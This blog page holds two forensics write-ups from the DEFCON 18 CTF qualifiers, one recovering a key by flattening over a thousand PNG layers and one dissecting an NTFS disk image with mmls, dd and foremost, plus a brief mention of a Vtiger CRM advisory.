With the Ush.it team we published an advisory about “Vtiger CRM 5.2.0 Multiple Vulnerabilities”. Have a nice read here!

Second forensic challange of the DEFCON 18 CTF qualifications: the suggestion was “find the key” and the related file is here. (Mirrors: #1)

Trying to identify the file.

$ file f200_02b7b50f575759cff7.tar.lzma
f200_02b7b50f575759cff7.tar.lzma: data

So we can try to trust the file extension.

$ unlzma -d f200_02b7b50f575759cff7.tar.lzma

$ tar xvf f200_02b7b50f575759cff7.tar
IMG_0001.png
IMG_0002.png
IMG_0003.png
IMG_0004.png
IMG_0005.png
IMG_0006.png
IMG_0007.png
IMG_0008.png
IMG_0009.png
IMG_0010.png
IMG_0011.png
IMG_0012.png
IMG_0013.png
IMG_0014.png
IMG_0015.png
IMG_0016.png
IMG_0017.png
IMG_0018.png
IMG_0019.png
IMG_0020.png
IMG_0021.png
IMG_0022.png
IMG_0023.png
IMG_0024.png
IMG_0025.png
IMG_0026.png
IMG_0027.png
IMG_0028.png
IMG_0029.png
IMG_0030.png
IMG_0031.png
IMG_0032.png
IMG_0033.png
IMG_0034.png
IMG_0035.png
IMG_0036.png
IMG_0037.png
IMG_0038.png
IMG_0039.png
IMG_0040.png
IMG_0041.png
IMG_0042.png
IMG_0043.png
IMG_0044.png
IMG_0045.png
IMG_0046.png
IMG_0047.png
IMG_0048.png
IMG_0049.png
IMG_0050.png
IMG_0051.png
IMG_0052.png
IMG_0053.png
IMG_0054.png
IMG_0055.png
IMG_0056.png
IMG_0057.png
IMG_0058.png
IMG_0059.png
IMG_0060.png
IMG_0061.png
IMG_0062.png
IMG_0063.png
IMG_0064.png
IMG_0065.png
IMG_0066.png
IMG_0067.png
IMG_0068.png
IMG_0069.png
IMG_0070.png
IMG_0071.png
IMG_0072.png
IMG_0073.png
IMG_0074.png
IMG_0075.png
IMG_0076.png
IMG_0077.png
IMG_0078.png
IMG_0079.png
IMG_0080.png
IMG_0081.png
IMG_0082.png
IMG_0083.png
IMG_0084.png
IMG_0085.png
IMG_0086.png
IMG_0087.png
IMG_0088.png
IMG_0089.png
IMG_0090.png
IMG_0091.png
IMG_0092.png
IMG_0093.png
IMG_0094.png
IMG_0095.png
IMG_0096.png
IMG_0097.png
IMG_0098.png
IMG_0099.png
IMG_0100.png
IMG_0101.png
IMG_0102.png
IMG_0103.png
IMG_0104.png
IMG_0105.png
IMG_0106.png
IMG_0107.png
IMG_0108.png
IMG_0109.png
IMG_0110.png
IMG_0111.png
IMG_0112.png
IMG_0113.png
IMG_0114.png
IMG_0115.png
IMG_0116.png
IMG_0117.png
IMG_0118.png
IMG_0119.png
IMG_0120.png
IMG_0121.png
IMG_0122.png
IMG_0123.png
IMG_0124.png
IMG_0125.png
IMG_0126.png
IMG_0127.png
IMG_0128.png
IMG_0129.png
IMG_0130.png
IMG_0131.png
IMG_0132.png
IMG_0133.png
IMG_0134.png
IMG_0135.png
IMG_0136.png
IMG_0137.png
IMG_0138.png
IMG_0139.png
IMG_0140.png
IMG_0141.png
IMG_0142.png
IMG_0143.png
IMG_0144.png
IMG_0145.png
IMG_0146.png
IMG_0147.png
IMG_0148.png
IMG_0149.png
IMG_0150.png
IMG_0151.png
IMG_0152.png
IMG_0153.png
IMG_0154.png
IMG_0155.png
IMG_0156.png
IMG_0157.png
IMG_0158.png
IMG_0159.png
IMG_0160.png
IMG_0161.png
IMG_0162.png
IMG_0163.png
IMG_0164.png
IMG_0165.png
IMG_0166.png
IMG_0167.png
IMG_0168.png
IMG_0169.png
IMG_0170.png
IMG_0171.png
IMG_0172.png
IMG_0173.png
IMG_0174.png
IMG_0175.png
IMG_0176.png
IMG_0177.png
IMG_0178.png
IMG_0179.png
IMG_0180.png
IMG_0181.png
IMG_0182.png
IMG_0183.png
IMG_0184.png
IMG_0185.png
IMG_0186.png
IMG_0187.png
IMG_0188.png
IMG_0189.png
IMG_0190.png
IMG_0191.png
IMG_0192.png
IMG_0193.png
IMG_0194.png
IMG_0195.png
IMG_0196.png
IMG_0197.png
IMG_0198.png
IMG_0199.png
IMG_0200.png
IMG_0201.png
IMG_0202.png
IMG_0203.png
IMG_0204.png
IMG_0205.png
IMG_0206.png
IMG_0207.png
IMG_0208.png
IMG_0209.png
IMG_0210.png
IMG_0211.png
IMG_0212.png
IMG_0213.png
IMG_0214.png
IMG_0215.png
IMG_0216.png
IMG_0217.png
IMG_0218.png
IMG_0219.png
IMG_0220.png
IMG_0221.png
IMG_0222.png
IMG_0223.png
IMG_0224.png
IMG_0225.png
IMG_0226.png
IMG_0227.png
IMG_0228.png
IMG_0229.png
IMG_0230.png
IMG_0231.png
IMG_0232.png
IMG_0233.png
IMG_0234.png
IMG_0235.png
IMG_0236.png
IMG_0237.png
IMG_0238.png
IMG_0239.png
IMG_0240.png
IMG_0241.png
IMG_0242.png
IMG_0243.png
IMG_0244.png
IMG_0245.png
IMG_0246.png
IMG_0247.png
IMG_0248.png
IMG_0249.png
IMG_0250.png
IMG_0251.png
IMG_0252.png
IMG_0253.png
IMG_0254.png
IMG_0255.png
IMG_0256.png
IMG_0257.png
IMG_0258.png
IMG_0259.png
IMG_0260.png
IMG_0261.png
IMG_0262.png
IMG_0263.png
IMG_0264.png
IMG_0265.png
IMG_0266.png
IMG_0267.png
IMG_0268.png
IMG_0269.png
IMG_0270.png
IMG_0271.png
IMG_0272.png
IMG_0273.png
IMG_0274.png
IMG_0275.png
IMG_0276.png
IMG_0277.png
IMG_0278.png
IMG_0279.png
IMG_0280.png
IMG_0281.png
IMG_0282.png
IMG_0283.png
IMG_0284.png
IMG_0285.png
IMG_0286.png
IMG_0287.png
IMG_0288.png
IMG_0289.png
IMG_0290.png
IMG_0291.png
IMG_0292.png
IMG_0293.png
IMG_0294.png
IMG_0295.png
IMG_0296.png
IMG_0297.png
IMG_0298.png
IMG_0299.png
IMG_0300.png
IMG_0301.png
IMG_0302.png
IMG_0303.png
IMG_0304.png
IMG_0305.png
IMG_0306.png
IMG_0307.png
IMG_0308.png
IMG_0309.png
IMG_0310.png
IMG_0311.png
IMG_0312.png
IMG_0313.png
IMG_0314.png
IMG_0315.png
IMG_0316.png
IMG_0317.png
IMG_0318.png
IMG_0319.png
IMG_0320.png
IMG_0321.png
IMG_0322.png
IMG_0323.png
IMG_0324.png
IMG_0325.png
IMG_0326.png
IMG_0327.png
IMG_0328.png
IMG_0329.png
IMG_0330.png
IMG_0331.png
IMG_0332.png
IMG_0333.png
IMG_0334.png
IMG_0335.png
IMG_0336.png
IMG_0337.png
IMG_0338.png
IMG_0339.png
IMG_0340.png
IMG_0341.png
IMG_0342.png
IMG_0343.png
IMG_0344.png
IMG_0345.png
IMG_0346.png
IMG_0347.png
IMG_0348.png
IMG_0349.png
IMG_0350.png
IMG_0351.png
IMG_0352.png
IMG_0353.png
IMG_0354.png
IMG_0355.png
IMG_0356.png
IMG_0357.png
IMG_0358.png
IMG_0359.png
IMG_0360.png
IMG_0361.png
IMG_0362.png
IMG_0363.png
IMG_0364.png
IMG_0365.png
IMG_0366.png
IMG_0367.png
IMG_0368.png
IMG_0369.png
IMG_0370.png
IMG_0371.png
IMG_0372.png
IMG_0373.png
IMG_0374.png
IMG_0375.png
IMG_0376.png
IMG_0377.png
IMG_0378.png
IMG_0379.png
IMG_0380.png
IMG_0381.png
IMG_0382.png
IMG_0383.png
IMG_0384.png
IMG_0385.png
IMG_0386.png
IMG_0387.png
IMG_0388.png
IMG_0389.png
IMG_0390.png
IMG_0391.png
IMG_0392.png
IMG_0393.png
IMG_0394.png
IMG_0395.png
IMG_0396.png
IMG_0397.png
IMG_0398.png
IMG_0399.png
IMG_0400.png
IMG_0401.png
IMG_0402.png
IMG_0403.png
IMG_0404.png
IMG_0405.png
IMG_0406.png
IMG_0407.png
IMG_0408.png
IMG_0409.png
IMG_0410.png
IMG_0411.png
IMG_0412.png
IMG_0413.png
IMG_0414.png
IMG_0415.png
IMG_0416.png
IMG_0417.png
IMG_0418.png
IMG_0419.png
IMG_0420.png
IMG_0421.png
IMG_0422.png
IMG_0423.png
IMG_0424.png
IMG_0425.png
IMG_0426.png
IMG_0427.png
IMG_0428.png
IMG_0429.png
IMG_0430.png
IMG_0431.png
IMG_0432.png
IMG_0433.png
IMG_0434.png
IMG_0435.png
IMG_0436.png
IMG_0437.png
IMG_0438.png
IMG_0439.png
IMG_0440.png
IMG_0441.png
IMG_0442.png
IMG_0443.png
IMG_0444.png
IMG_0445.png
IMG_0446.png
IMG_0447.png
IMG_0448.png
IMG_0449.png
IMG_0450.png
IMG_0451.png
IMG_0452.png
IMG_0453.png
IMG_0454.png
IMG_0455.png
IMG_0456.png
IMG_0457.png
IMG_0458.png
IMG_0459.png
IMG_0460.png
IMG_0461.png
IMG_0462.png
IMG_0463.png
IMG_0464.png
IMG_0465.png
IMG_0466.png
IMG_0467.png
IMG_0468.png
IMG_0469.png
IMG_0470.png
IMG_0471.png
IMG_0472.png
IMG_0473.png
IMG_0474.png
IMG_0475.png
IMG_0476.png
IMG_0477.png
IMG_0478.png
IMG_0479.png
IMG_0480.png
IMG_0481.png
IMG_0482.png
IMG_0483.png
IMG_0484.png
IMG_0485.png
IMG_0486.png
IMG_0487.png
IMG_0488.png
IMG_0489.png
IMG_0490.png
IMG_0491.png
IMG_0492.png
IMG_0493.png
IMG_0494.png
IMG_0495.png
IMG_0496.png
IMG_0497.png
IMG_0498.png
IMG_0499.png
IMG_0500.png
IMG_0501.png
IMG_0502.png
IMG_0503.png
IMG_0504.png
IMG_0505.png
IMG_0506.png
IMG_0507.png
IMG_0508.png
IMG_0509.png
IMG_0510.png
IMG_0511.png
IMG_0512.png
IMG_0513.png
IMG_0514.png
IMG_0515.png
IMG_0516.png
IMG_0517.png
IMG_0518.png
IMG_0519.png
IMG_0520.png
IMG_0521.png
IMG_0522.png
IMG_0523.png
IMG_0524.png
IMG_0525.png
IMG_0526.png
IMG_0527.png
IMG_0528.png
IMG_0529.png
IMG_0530.png
IMG_0531.png
IMG_0532.png
IMG_0533.png
IMG_0534.png
IMG_0535.png
IMG_0536.png
IMG_0537.png
IMG_0538.png
IMG_0539.png
IMG_0540.png
IMG_0541.png
IMG_0542.png
IMG_0543.png
IMG_0544.png
IMG_0545.png
IMG_0546.png
IMG_0547.png
IMG_0548.png
IMG_0549.png
IMG_0550.png
IMG_0551.png
IMG_0552.png
IMG_0553.png
IMG_0554.png
IMG_0555.png
IMG_0556.png
IMG_0557.png
IMG_0558.png
IMG_0559.png
IMG_0560.png
IMG_0561.png
IMG_0562.png
IMG_0563.png
IMG_0564.png
IMG_0565.png
IMG_0566.png
IMG_0567.png
IMG_0568.png
IMG_0569.png
IMG_0570.png
IMG_0571.png
IMG_0572.png
IMG_0573.png
IMG_0574.png
IMG_0575.png
IMG_0576.png
IMG_0577.png
IMG_0578.png
IMG_0579.png
IMG_0580.png
IMG_0581.png
IMG_0582.png
IMG_0583.png
IMG_0584.png
IMG_0585.png
IMG_0586.png
IMG_0587.png
IMG_0588.png
IMG_0589.png
IMG_0590.png
IMG_0591.png
IMG_0592.png
IMG_0593.png
IMG_0594.png
IMG_0595.png
IMG_0596.png
IMG_0597.png
IMG_0598.png
IMG_0599.png
IMG_0600.png
IMG_0601.png
IMG_0602.png
IMG_0603.png
IMG_0604.png
IMG_0605.png
IMG_0606.png
IMG_0607.png
IMG_0608.png
IMG_0609.png
IMG_0610.png
IMG_0611.png
IMG_0612.png
IMG_0613.png
IMG_0614.png
IMG_0615.png
IMG_0616.png
IMG_0617.png
IMG_0618.png
IMG_0619.png
IMG_0620.png
IMG_0621.png
IMG_0622.png
IMG_0623.png
IMG_0624.png
IMG_0625.png
IMG_0626.png
IMG_0627.png
IMG_0628.png
IMG_0629.png
IMG_0630.png
IMG_0631.png
IMG_0632.png
IMG_0633.png
IMG_0634.png
IMG_0635.png
IMG_0636.png
IMG_0637.png
IMG_0638.png
IMG_0639.png
IMG_0640.png
IMG_0641.png
IMG_0642.png
IMG_0643.png
IMG_0644.png
IMG_0645.png
IMG_0646.png
IMG_0647.png
IMG_0648.png
IMG_0649.png
IMG_0650.png
IMG_0651.png
IMG_0652.png
IMG_0653.png
IMG_0654.png
IMG_0655.png
IMG_0656.png
IMG_0657.png
IMG_0658.png
IMG_0659.png
IMG_0660.png
IMG_0661.png
IMG_0662.png
IMG_0663.png
IMG_0664.png
IMG_0665.png
IMG_0666.png
IMG_0667.png
IMG_0668.png
IMG_0669.png
IMG_0670.png
IMG_0671.png
IMG_0672.png
IMG_0673.png
IMG_0674.png
IMG_0675.png
IMG_0676.png
IMG_0677.png
IMG_0678.png
IMG_0679.png
IMG_0680.png
IMG_0681.png
IMG_0682.png
IMG_0683.png
IMG_0684.png
IMG_0685.png
IMG_0686.png
IMG_0687.png
IMG_0688.png
IMG_0689.png
IMG_0690.png
IMG_0691.png
IMG_0692.png
IMG_0693.png
IMG_0694.png
IMG_0695.png
IMG_0696.png
IMG_0697.png
IMG_0698.png
IMG_0699.png
IMG_0700.png
IMG_0701.png
IMG_0702.png
IMG_0703.png
IMG_0704.png
IMG_0705.png
IMG_0706.png
IMG_0707.png
IMG_0708.png
IMG_0709.png
IMG_0710.png
IMG_0711.png
IMG_0712.png
IMG_0713.png
IMG_0714.png
IMG_0715.png
IMG_0716.png
IMG_0717.png
IMG_0718.png
IMG_0719.png
IMG_0720.png
IMG_0721.png
IMG_0722.png
IMG_0723.png
IMG_0724.png
IMG_0725.png
IMG_0726.png
IMG_0727.png
IMG_0728.png
IMG_0729.png
IMG_0730.png
IMG_0731.png
IMG_0732.png
IMG_0733.png
IMG_0734.png
IMG_0735.png
IMG_0736.png
IMG_0737.png
IMG_0738.png
IMG_0739.png
IMG_0740.png
IMG_0741.png
IMG_0742.png
IMG_0743.png
IMG_0744.png
IMG_0745.png
IMG_0746.png
IMG_0747.png
IMG_0748.png
IMG_0749.png
IMG_0750.png
IMG_0751.png
IMG_0752.png
IMG_0753.png
IMG_0754.png
IMG_0755.png
IMG_0756.png
IMG_0757.png
IMG_0758.png
IMG_0759.png
IMG_0760.png
IMG_0761.png
IMG_0762.png
IMG_0763.png
IMG_0764.png
IMG_0765.png
IMG_0766.png
IMG_0767.png
IMG_0768.png
IMG_0769.png
IMG_0770.png
IMG_0771.png
IMG_0772.png
IMG_0773.png
IMG_0774.png
IMG_0775.png
IMG_0776.png
IMG_0777.png
IMG_0778.png
IMG_0779.png
IMG_0780.png
IMG_0781.png
IMG_0782.png
IMG_0783.png
IMG_0784.png
IMG_0785.png
IMG_0786.png
IMG_0787.png
IMG_0788.png
IMG_0789.png
IMG_0790.png
IMG_0791.png
IMG_0792.png
IMG_0793.png
IMG_0794.png
IMG_0795.png
IMG_0796.png
IMG_0797.png
IMG_0798.png
IMG_0799.png
IMG_0800.png
IMG_0801.png
IMG_0802.png
IMG_0803.png
IMG_0804.png
IMG_0805.png
IMG_0806.png
IMG_0807.png
IMG_0808.png
IMG_0809.png
IMG_0810.png
IMG_0811.png
IMG_0812.png
IMG_0813.png
IMG_0814.png
IMG_0815.png
IMG_0816.png
IMG_0817.png
IMG_0818.png
IMG_0819.png
IMG_0820.png
IMG_0821.png
IMG_0822.png
IMG_0823.png
IMG_0824.png
IMG_0825.png
IMG_0826.png
IMG_0827.png
IMG_0828.png
IMG_0829.png
IMG_0830.png
IMG_0831.png
IMG_0832.png
IMG_0833.png
IMG_0834.png
IMG_0835.png
IMG_0836.png
IMG_0837.png
IMG_0838.png
IMG_0839.png
IMG_0840.png
IMG_0841.png
IMG_0842.png
IMG_0843.png
IMG_0844.png
IMG_0845.png
IMG_0846.png
IMG_0847.png
IMG_0848.png
IMG_0849.png
IMG_0850.png
IMG_0851.png
IMG_0852.png
IMG_0853.png
IMG_0854.png
IMG_0855.png
IMG_0856.png
IMG_0857.png
IMG_0858.png
IMG_0859.png
IMG_0860.png
IMG_0861.png
IMG_0862.png
IMG_0863.png
IMG_0864.png
IMG_0865.png
IMG_0866.png
IMG_0867.png
IMG_0868.png
IMG_0869.png
IMG_0870.png
IMG_0871.png
IMG_0872.png
IMG_0873.png
IMG_0874.png
IMG_0875.png
IMG_0876.png
IMG_0877.png
IMG_0878.png
IMG_0879.png
IMG_0880.png
IMG_0881.png
IMG_0882.png
IMG_0883.png
IMG_0884.png
IMG_0885.png
IMG_0886.png
IMG_0887.png
IMG_0888.png
IMG_0889.png
IMG_0890.png
IMG_0891.png
IMG_0892.png
IMG_0893.png
IMG_0894.png
IMG_0895.png
IMG_0896.png
IMG_0897.png
IMG_0898.png
IMG_0899.png
IMG_0900.png
IMG_0901.png
IMG_0902.png
IMG_0903.png
IMG_0904.png
IMG_0905.png
IMG_0906.png
IMG_0907.png
IMG_0908.png
IMG_0909.png
IMG_0910.png
IMG_0911.png
IMG_0912.png
IMG_0913.png
IMG_0914.png
IMG_0915.png
IMG_0916.png
IMG_0917.png
IMG_0918.png
IMG_0919.png
IMG_0920.png
IMG_0921.png
IMG_0922.png
IMG_0923.png
IMG_0924.png
IMG_0925.png
IMG_0926.png
IMG_0927.png
IMG_0928.png
IMG_0929.png
IMG_0930.png
IMG_0931.png
IMG_0932.png
IMG_0933.png
IMG_0934.png
IMG_0935.png
IMG_0936.png
IMG_0937.png
IMG_0938.png
IMG_0939.png
IMG_0940.png
IMG_0941.png
IMG_0942.png
IMG_0943.png
IMG_0944.png
IMG_0945.png
IMG_0946.png
IMG_0947.png
IMG_0948.png
IMG_0949.png
IMG_0950.png
IMG_0951.png
IMG_0952.png
IMG_0953.png
IMG_0954.png
IMG_0955.png
IMG_0956.png
IMG_0957.png
IMG_0958.png
IMG_0959.png
IMG_0960.png
IMG_0961.png
IMG_0962.png
IMG_0963.png
IMG_0964.png
IMG_0965.png
IMG_0966.png
IMG_0967.png
IMG_0968.png
IMG_0969.png
IMG_0970.png
IMG_0971.png
IMG_0972.png
IMG_0973.png
IMG_0974.png
IMG_0975.png
IMG_0976.png
IMG_0977.png
IMG_0978.png
IMG_0979.png
IMG_0980.png
IMG_0981.png
IMG_0982.png
IMG_0983.png
IMG_0984.png
IMG_0985.png
IMG_0986.png
IMG_0987.png
IMG_0988.png
IMG_0989.png
IMG_0990.png
IMG_0991.png
IMG_0992.png
IMG_0993.png
IMG_0994.png
IMG_0995.png
IMG_0996.png
IMG_0997.png
IMG_0998.png
IMG_0999.png
IMG_1000.png
IMG_1001.png
IMG_1002.png
IMG_1003.png
IMG_1004.png
IMG_1005.png
IMG_1006.png
IMG_1007.png
IMG_1008.png
IMG_1009.png
IMG_1010.png
IMG_1011.png
IMG_1012.png
IMG_1013.png
IMG_1014.png
IMG_1015.png
IMG_1016.png
IMG_1017.png
IMG_1018.png
IMG_1019.png
IMG_1020.png
IMG_1021.png
IMG_1022.png
IMG_1023.png
IMG_1024.png
IMG_1025.png
IMG_1026.png
IMG_1027.png
IMG_1028.png
IMG_1029.png
IMG_1030.png
IMG_1031.png
IMG_1032.png
IMG_1033.png
IMG_1034.png
IMG_1035.png
IMG_1036.png
IMG_1037.png
IMG_1038.png
IMG_1039.png
IMG_1040.png
IMG_1041.png
IMG_1042.png
IMG_1043.png
IMG_1044.png
IMG_1045.png
IMG_1046.png
IMG_1047.png
IMG_1048.png
IMG_1049.png
IMG_1050.png
IMG_1051.png
IMG_1052.png
IMG_1053.png
IMG_1054.png
IMG_1055.png
IMG_1056.png
IMG_1057.png
IMG_1058.png
IMG_1059.png
IMG_1060.png
IMG_1061.png
IMG_1062.png
IMG_1063.png
IMG_1064.png
IMG_1065.png
IMG_1066.png
IMG_1067.png
IMG_1068.png
IMG_1069.png
IMG_1070.png
IMG_1071.png
IMG_1072.png
IMG_1073.png
IMG_1074.png
IMG_1075.png
IMG_1076.png
IMG_1077.png
IMG_1078.png
IMG_1079.png
IMG_1080.png
IMG_1081.png
IMG_1082.png
IMG_1083.png
IMG_1084.png
IMG_1085.png
IMG_1086.png
IMG_1087.png
IMG_1088.png
IMG_1089.png
IMG_1090.png
IMG_1091.png
IMG_1092.png
IMG_1093.png
IMG_1094.png
IMG_1095.png
IMG_1096.png
IMG_1097.png
IMG_1098.png
IMG_1099.png
IMG_1100.png
IMG_1101.png
IMG_1102.png
IMG_1103.png
IMG_1104.png
IMG_1105.png
IMG_1106.png
IMG_1107.png
IMG_1108.png
IMG_1109.png
IMG_1110.png
IMG_1111.png
IMG_1112.png
IMG_1113.png
IMG_1114.png
IMG_1115.png
IMG_1116.png
IMG_1117.png
IMG_1118.png
IMG_1119.png
IMG_1120.png
IMG_1121.png

There are a lot of images, apparently all of the same size. We can try to use pngtools the examine the respect of image attributes and the presence of metadata.

$ pnginfo IMG_1116.png
IMG_1116.png…
Image Width: 118 Image Length: 810
Bitdepth (Bits/Sample): 8
Channels (Samples/Pixel): 4
Pixel depth (Pixel Depth): 32
Colour Type (Photometric Interpretation): RGB with alpha channel
Image filter: Single row per byte filter
Interlacing: No interlacing
Compression Scheme: Deflate method 8, 32k window
Resolution: 0, 0 (unit unknown)
FillOrder: msb-to-lsb
Byte Order: Network (Big Endian)
Number of text strings: 0 of 0

There are no interesting metadata. But it seems that each image contains some pixels, we can try to compose all the images.

$ convert -background skyblue *.png -layers flatten +repage Flatten.png

And inside there is the key: http://is.gd/ced7F

Some times ago i get a lot of fun at DEFCON 18 CTF qualifications with a group of really skilled friends. Now a bit later, here is my writeup for some challenges.

First forensic challange of the DEFCON 18 CTF qualifications: the suggestion was “find the key” and the related file is here. (Mirrors: #1, #2)

$ file f100_6db079ca91c4860f.bin
f100_6db079ca91c4860f.bin: x86 boot sector; partition 1: ID=0×7, starthead 0, startsector 31, 31558 sectors, extended partition table (last)11, code offset 0×0

Now take a look at the partition table.

$ xxd -l 512 f100_6db079ca91c4860f.bin
0000000: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000010: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000020: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000030: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000040: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000050: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000060: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000070: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000080: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000090: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00000a0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00000b0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00000c0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00000d0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00000e0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00000f0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000100: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000110: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000120: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000130: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000140: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000150: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000160: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000170: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000180: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
0000190: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00001a0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00001b0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00001c0: 0101 0700 dffa 1f00 0000 467b 0000 0000  ……….F{….
00001d0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00001e0: 0000 0000 0000 0000 0000 0000 0000 0000  …………….
00001f0: 0000 0000 0000 0000 0000 0000 0000 55aa  …………..U.

$ xxd -l 512 -s 15872 f100_6db079ca91c4860f.bin
0003e00: eb52 904e 5446 5320 2020 2000 0208 0000  .R.NTFS    …..
0003e10: 0000 0000 00f8 0000 3f00 ff00 1f00 0000  ……..?…….
0003e20: 0000 0000 8000 0000 457b 0000 0000 0000  ……..E{……
0003e30: 2205 0000 0000 0000 0200 0000 0000 0000  “……………
0003e40: f600 0000 0100 0000 631f 85d4 4885 d422  ……..c…H..”
0003e50: 0000 0000 fa33 c08e d0bc 007c fb68 c007  …..3…..|.h..
0003e60: 1f1e 6866 00cb 8816 0e00 6681 3e03 004e  ..hf……f.>..N
0003e70: 5446 5375 15b4 41bb aa55 cd13 720c 81fb  TFSu..A..U..r…
0003e80: 55aa 7506 f7c1 0100 7503 e9dd 001e 83ec  U.u…..u…….
0003e90: 1868 1a00 b448 8a16 0e00 8bf4 161f cd13  .h…H……….
0003ea0: 9f83 c418 9e58 1f72 e13b 060b 0075 dba3  …..X.r.;…u..
0003eb0: 0f00 c12e 0f00 041e 5a33 dbb9 0020 2bc8  ……..Z3… +.
0003ec0: 66ff 0611 0003 160f 008e c2ff 0616 00e8  f……………
0003ed0: 4b00 2bc8 77ef b800 bbcd 1a66 23c0 752d  K.+.w……f#.u-
0003ee0: 6681 fb54 4350 4175 2481 f902 0172 1e16  f..TCPAu$….r..
0003ef0: 6807 bb16 6870 0e16 6809 0066 5366 5366  h…hp..h..fSfSf
0003f00: 5516 1616 68b8 0166 610e 07cd 1a33 c0bf  U…h..fa….3..
0003f10: 2810 b9d8 0ffc f3aa e95f 0190 9066 601e  (…….._…f`.
0003f20: 0666 a111 0066 0306 1c00 1e66 6800 0000  .f…f…..fh…
0003f30: 0066 5006 5368 0100 6810 00b4 428a 160e  .fP.Sh..h…B…
0003f40: 0016 1f8b f4cd 1366 595b 5a66 5966 591f  …….fY[ZfYfY.
0003f50: 0f82 1600 66ff 0611 0003 160f 008e c2ff  ….f………..
0003f60: 0e16 0075 bc07 1f66 61c3 a0f8 01e8 0900  …u…fa…….
0003f70: a0fb 01e8 0300 f4eb fdb4 018b f0ac 3c00  …………..<.
0003f80: 7409 b40e bb07 00cd 10eb f2c3 0d0a 4120  t………….A
0003f90: 6469 736b 2072 6561 6420 6572 726f 7220  disk read error
0003fa0: 6f63 6375 7272 6564 000d 0a42 4f4f 544d  occurred…BOOTM
0003fb0: 4752 2069 7320 6d69 7373 696e 6700 0d0a  GR is missing…
0003fc0: 424f 4f54 4d47 5220 6973 2063 6f6d 7072  BOOTMGR is compr
0003fd0: 6573 7365 6400 0d0a 5072 6573 7320 4374  essed…Press Ct
0003fe0: 726c 2b41 6c74 2b44 656c 2074 6f20 7265  rl+Alt+Del to re
0003ff0: 7374 6172 740d 0a00 8ca9 bed6 0000 55aa  start………U.

Seems some sort of Windows image. Get a look at the full partition table.

$ mmls f100_6db079ca91c4860f.bin
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01:  —–   0000000000   0000000030   0000000031   Unallocated
02:  00:00   0000000031   0000031588   0000031558   NTFS (0×07)
03:  —–   0000031589   0000031615   0000000027   Unallocated

Using these values we can extract the partitions with dd.

$ dd if=f100_6db079ca91c4860f.bin of=p0.bin bs=512 skip=0 count=1
1+0 records in
1+0 records out
512 bytes (512 B) copied, 5.0705e-05 s, 10.1 MB/s
$ dd if=f100_6db079ca91c4860f.bin of=p1.bin bs=512 skip=0 count=31
31+0 records in
31+0 records out
15872 bytes (16 kB) copied, 0.000218534 s, 72.6 MB/s
$ dd if=f100_6db079ca91c4860f.bin of=p2.bin bs=512 skip=31
31585+0 records in
31585+0 records out
16171520 bytes (16 MB) copied, 0.298363 s, 54.2 MB/s
$ dd if=f100_6db079ca91c4860f.bin of=p3.bin bs=512 skip=31589
27+0 records in
27+0 records out
13824 bytes (14 kB) copied, 0.000205892 s, 67.1 MB/s

Now re-check partions with file.

$ file p*.bin
p0.bin: x86 boot sector; partition 1: ID=0×7, starthead 0, startsector 31, 31558 sectors, extended partition table (last)11, code offset 0×0
p1.bin: x86 boot sector; partition 1: ID=0×7, starthead 0, startsector 31, 31558 sectors, extended partition table (last)11, code offset 0×0
p2.bin: x86 boot sector, code offset 0×52, OEM-ID “NTFS    “, sectors/cluster 8, reserved sectors 0, Media descriptor 0xf8, heads 255, hidden sectors 31, dos < 4.0 BootSector (0×0)
p3.bin: data

Now take a quick look with strings at each partitions, if you are lucky you can see the key. Anyway go ahead with the full analysis.

Now run foremost to carve files on all partitions.

$ foremost -i p0.bin -o p0
Processing: p0.bin
|*|
$ foremost -i p1.bin -o p1
Processing: p1.bin
|*|
$ foremost -i p2.bin -o p2
Processing: p2.bin
|*|
$ foremost -i p3.bin -o p3
Processing: p3.bin
|*|

On p2.bin foremost recovers some file as we can see from audit.txt.

$ cat p2/audit.txt
Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus
Audit File

Foremost started at Sun Jun 20 17:47:43 2010
Invocation: foremost -i p2.bin -o p2
Output directory: /home/jekil/Desktop/p2
Configuration file: /etc/foremost.conf
——————————————————————
File: p2.bin
Start: Sun Jun 20 17:47:43 2010
Length: 15 MB (16171520 bytes)

Num     Name (bs=512)           Size     File Offset     Comment

0:    00000312.jpg           11 KB          159744
1:    00000336.jpg            4 KB          172032
2:    00000344.jpg            1 KB          176128
3:    00001032.jpg           13 KB          528384
4:    00001064.jpg           36 KB          544768
5:    00001144.jpg           32 KB          585728
6:    00001216.jpg            4 KB          622592
7:    00000288.png            9 KB          147456       (634 x 278)
Finish: Sun Jun 20 17:47:43 2010

8 FILES EXTRACTED

jpg:= 7
png:= 1
——————————————————————

Foremost finished at Sun Jun 20 17:47:43 2010

